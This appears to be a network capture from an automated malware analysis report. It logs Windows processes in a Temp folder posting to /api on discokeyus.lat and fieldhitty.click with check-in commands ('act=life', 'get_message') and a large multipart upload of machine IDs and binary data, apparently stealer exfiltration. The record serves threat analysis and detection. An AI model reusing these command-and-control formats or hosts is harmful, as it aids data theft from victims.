2024-12-22 01:18:41 UTC	214	IN	Data Raw: 64 30 0d 0a 65 6b 76 49 43 65 70 74 4e 53 62 53 6e 77 39 37 69 42 72 4d 48 31 62 76 63 6e 76 62 6b 78 57 6a 6c 59 55 54 6d 72 56 68 47 67 63 68 4d 4f 70 38 79 46 63 58 54 71 62 72 66 30 48 55 4e 5a 41 77 5a 39 64 48 56 65 6d 69 49 49 32 6b 74 43 43 30 68 46 64 47 4b 42 55 74 72 6c 58 46 43 56 42 41 2f 50 70 33 48 71 6f 32 37 6e 6b 69 7a 55 68 4c 39 37 46 77 67 61 2b 31 62 72 62 4f 51 32 38 6c 51 47 6d 67 66 5a 34 64 44 33 72 39 77 79 42 4b 73 43 2f 69 4c 57 66 61 58 45 72 71 6f 44 75 53 6f 39 6b 38 36 63 45 45 65 32 6f 6d 5a 4c 70 6f 68 41 6c 61 53 2f 7a 36 64 78 36 71 4e 75 35 35 49 73 31 49 53 2f 65 78 63 49 47 76 74 57 37 48 0d 0a Data Ascii: d0ekvICeptNSbSnw97iBrMH1bvcnvbkxWjlYUTmrVhGgchMOp8yFcXTqbrf0HUNZAwZ9dHVemiII2ktCC0hFdGKBUtrlXFCVBA/Pp3Hqo27nkizUhL97Fwga+1brbOQ28lQGmgfZ4dD3r9wyBKsC/iLWfaXErqoDuSo9k86cEEe2omZLpohAlaS/z6dx6qNu55Is1IS/excIGvtW7H
2024-12-22 01:18:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50177	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:42 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E390UQ9J5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549707 Host: discokeyus.lat
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 33 39 30 55 51 39 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --E390UQ9J5Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--E390UQ9J5Content-Disposition: form-data; name="pid"1--E390UQ9J5Content-Disposition: form-data; name="lid"PsFKDg--pablo--E390UQ9J5Content-Disp
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 bf b1 a9 28 f8 ef 62 da ec e1 Data Ascii: e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te(b
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d ed a4 3f 28 81 f8 17 65 17 af Data Ascii: rRZ'R%0Zo[TqeuJ`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/KvtQ!3K4+EVh}8%tGJ:Ky.!,.v=0m?(e
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 72 30 47 80 7e 46 06 46 13 7c Data Ascii: *.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim\|quzqZ1&r0G~FF\|
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db 13 d0 e2 39 d3 cc 04 d1 d8 e7 Data Ascii: ^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%9
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 93 2a c4 de f8 b5 55 49 cb f2 Data Ascii: =z~XV86E\|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;;f[ 8$oaq"^~knUI
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 71 2c 47 1a 7a 3d 12 37 5b 1c Data Ascii: EMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8Cq,Gz=7[
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c d2 22 f2 4f dd f2 20 3a 35 38 Data Ascii: 6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=\|XuvD7YPFOK<OX0/~h- Gy7e`9:y\|:pbl"O :58
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d d9 14 da d8 da 06 66 ee 8d 2d Data Ascii: .CT~w['@+FX3B?tb7Ikf[%&B\|@Pd?i>j,}up#KEF\#t63Yc+O\|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~Mf-
2024-12-22 01:18:42 UTC	15331	OUT	Data Raw: 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 dd 64 1b 96 c7 08 b4 fe 5c d3 Data Ascii: 7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{ d\
2024-12-22 01:18:45 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fouhhvmrvlrv8bdbu7puoeoeeg; expires=Wed, 16 Apr 2025 19:05:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qW39Gyex9Fwi8P2L3APoxqAxtUU6zY9UEOxW1VuyoGZFPu8h4g0xUHZo2sWTtEYPofmvP7ZK6kOWmdaUNkyhMT8Qx69x4Y96ogvUewjcx9bXOCXpGzysrb7%2BX96vBlhlpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c478cefcc41e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1587&rtt_var=607&sent=316&recv=573&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552177&delivery_rate=1784841&cwnd=249&unsent_bytes=0&cid=628a1769cf4f1bcd&ts=3146&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	50180	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:44 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: discokeyus.lat
2024-12-22 01:18:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:18:45 UTC	1126	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kpouo2bqq2atuo717ifa0dp6hc; expires=Wed, 16 Apr 2025 19:05:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSvsFpvHAu%2FDijvL5FPT1TvZq8sFsO631zpzXYys2YU07OvWs%2Fy4tPb0GVBxP47jdVv0ARkhj74qID7OnJ4GFHXbUcs%2Btt1JdJ5ZF36y2xVSderqm8iOpEHWi9TuygQF7A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47995ce4729b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1942&rtt_var=738&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1471774&cwnd=249&unsent_bytes=0&cid=08552b0840fd8446&ts=1187&x=0"
2024-12-22 01:18:45 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-22 01:18:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50185	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:47 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fieldhitty.click
2024-12-22 01:18:47 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-22 01:18:47 UTC	1116	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mv468l6hcpsa102jcihn77efaa; expires=Wed, 16 Apr 2025 19:05:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnDjbyCNelGZr8royR3IxMjhw9avh3JkDEOuzbZmSxitXLUNAr8NR6Dru7h7tQFAfZWJdqx6myMzZFmlPadTaUKfyknVb7WyQFme5Ou9noqw0jz1C4mrwvC5q1pWMODdVRqJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47a9abd641e6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1604&rtt_var=608&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=1788120&cwnd=182&unsent_bytes=0&cid=756456bfef691853&ts=1024&x=0"
2024-12-22 01:18:47 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-22 01:18:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50186	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:47 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: discokeyus.lat
2024-12-22 01:18:47 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:18:48 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9ulq1pi8qnhcq1975gbl34cbtm; expires=Wed, 16 Apr 2025 19:05:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kPnhvsnfgWaT9wgnO2spxbE4K3lqqun9kxVtpzuYYIV49red2pFmT0mf7cPjshB7D7ZOc5rpbrOuG7h%2FlgHkr%2FocrRF8WGt9xgSh0bDKes%2BEDWgeOxAFeH1uhqhW5cZGHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47aa9b928cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1775&rtt_var=683&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=980&delivery_rate=1582655&cwnd=189&unsent_bytes=0&cid=4a4953ad87803fcf&ts=917&x=0"
2024-12-22 01:18:48 UTC	214	IN	Data Raw: 64 30 0d 0a 43 73 44 6e 6e 7a 6a 58 4c 7a 48 62 65 39 4b 72 6e 63 6e 32 47 58 4e 59 7a 33 70 30 33 4d 6a 39 2b 53 6e 42 47 71 39 32 4a 68 78 52 75 38 58 71 47 75 30 4e 57 61 38 50 6f 70 48 42 35 71 6f 32 51 6d 44 36 56 45 62 74 2f 64 50 49 47 50 49 30 6e 6b 42 36 4d 32 57 6d 67 63 4d 58 73 30 70 58 39 52 36 71 7a 72 2f 6c 31 48 38 48 65 76 56 4b 57 50 36 74 33 38 4d 5a 76 44 62 55 56 46 4d 2b 4d 4f 4b 50 36 30 79 6e 46 57 33 30 4a 2f 32 61 70 66 7a 59 4b 30 4a 74 34 55 74 46 37 2b 62 4d 7a 33 58 75 61 64 73 54 52 33 46 57 37 35 58 2b 56 72 4e 41 58 50 55 65 71 73 36 2f 35 64 52 2f 42 33 72 31 53 6c 6a 2b 72 64 2f 44 47 62 78 48 0d 0a Data Ascii: d0CsDnnzjXLzHbe9Krncn2GXNYz3p03Mj9+SnBGq92JhxRu8XqGu0NWa8PopHB5qo2QmD6VEbt/dPIGPI0nkB6M2WmgcMXs0pX9R6qzr/l1H8HevVKWP6t38MZvDbUVFM+MOKP60ynFW30J/2apfzYK0Jt4UtF7+bMz3XuadsTR3FW75X+VrNAXPUeqs6/5dR/B3r1Slj+rd/DGbxH
2024-12-22 01:18:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	50189	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:47 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: discokeyus.lat
2024-12-22 01:18:47 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-22 01:18:48 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8fnrou1vb8fu7c3i771abga73n; expires=Wed, 16 Apr 2025 19:05:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ag6O6gf%2BGis9dYPc4IKoxh1Tutf4cNCFMj0BYMdi9EjYkRWnRIUlPp7g7YaujiYD9qXQWCyppaJ%2FIRv9VVl07blAhlrpxYb3xnAIx9Z%2B0OcO6xDmBMB0kVBnqMxI1X1tg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47aafe28efa9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1782&rtt_var=1081&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=945&delivery_rate=850072&cwnd=140&unsent_bytes=0&cid=d507674050ee0a4d&ts=788&x=0"
